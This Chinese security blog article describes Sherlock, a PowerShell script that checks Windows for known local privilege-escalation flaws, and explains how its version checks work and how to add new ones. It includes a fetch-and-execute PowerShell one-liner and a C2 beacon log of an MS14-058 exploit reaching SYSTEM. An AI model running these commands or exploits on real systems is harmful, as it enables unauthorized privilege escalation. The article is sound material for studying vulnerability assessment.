针对提权小神器Sherlock的分析与利用
*原创作者:zusheng,本文属FreeBuf原创奖励计划,未经许可禁止转载
0×01 Sherlock简介
Sherlock是一个在Windows下用于本地提权的PowerShell脚本。
目前包含了以下漏洞:
- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : ‘mrxdav.sys’ WebDAV
- MS16-032 : Secondary Logon Handle
0×02 初步使用
本地加载脚本
Import-Module Sherlock.ps1
远程加载脚本
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
发现漏洞:
PS C:\Users\Administrator> Find-AllVulns
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Appears Vulnerable就是存在漏洞
验证:
PS C:\Users\Administrator> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...
[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105
[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
可以发现提权成功,注意Sherlock只是验证,并不能帮助你直接进行利用。
0×03 隐藏的小技巧
除了上述的基本功能外,脚本里面还隐藏了一些作者没有介绍到的小功能
获取软件版本
Sherlock还可以让我们来获取软件的版本号,我们只需要运行Get-FileVersionInfo
命令即可。
演示:
获取CPU架构
运行Get-Architecture
命令,我们就可以知道CPU的架构是32位还是64位的。
演示:
0×04 Sherlock漏洞验证原理分析
Sherlock除了作者已经加入的那些漏洞,我们还可以自己来加入感兴趣的漏洞。再添加漏洞之前,我们先来分析一下Sherlock漏洞验证的原理。
在Sherlock中,每一个漏洞验证模块都是一个function
,具体形式如下:
function Find-MS16032 {
}
然后使用Get-Architecture
来获取系统版本,判断系统版本是否存在提权漏洞。符合再进行下一步判断。
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )
然后通过Get-FileVersionInfo
获取存在漏洞的文件的版本信息,主要提取后面两段数字。
然后就简单了,用一个switch+if对比版本就行了:
switch ( $Build ) {
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
然后我们自己添加漏洞就简单了,在function New-ExploitTable
中加入漏洞信息。
测试一下,我们先来创建一个function Find-MS16135
:
function Find-MS16135 {
$MSBulletin = "MS16-135"
$VulnStatus = "Appears Vulnerable"
Set-ExploitTable $MSBulletin $VulnStatus
}
然后在function Find-AllVulns
中加入Find-MS16135
就OK啦。
测试看看:
0×05 总结
整个框架总体思路就是这样咯,接下来就看小伙伴们来查找存在漏洞的文件版本了,目前我还没好的思路可以快速去寻找存在漏洞的文件版本,不知道大家有没有好的思路求分享啊。
项目地址:https://github.com/rasta-mouse/Sherlock
*原创作者:zusheng,本文属FreeBuf原创奖励计划,未经许可禁止转载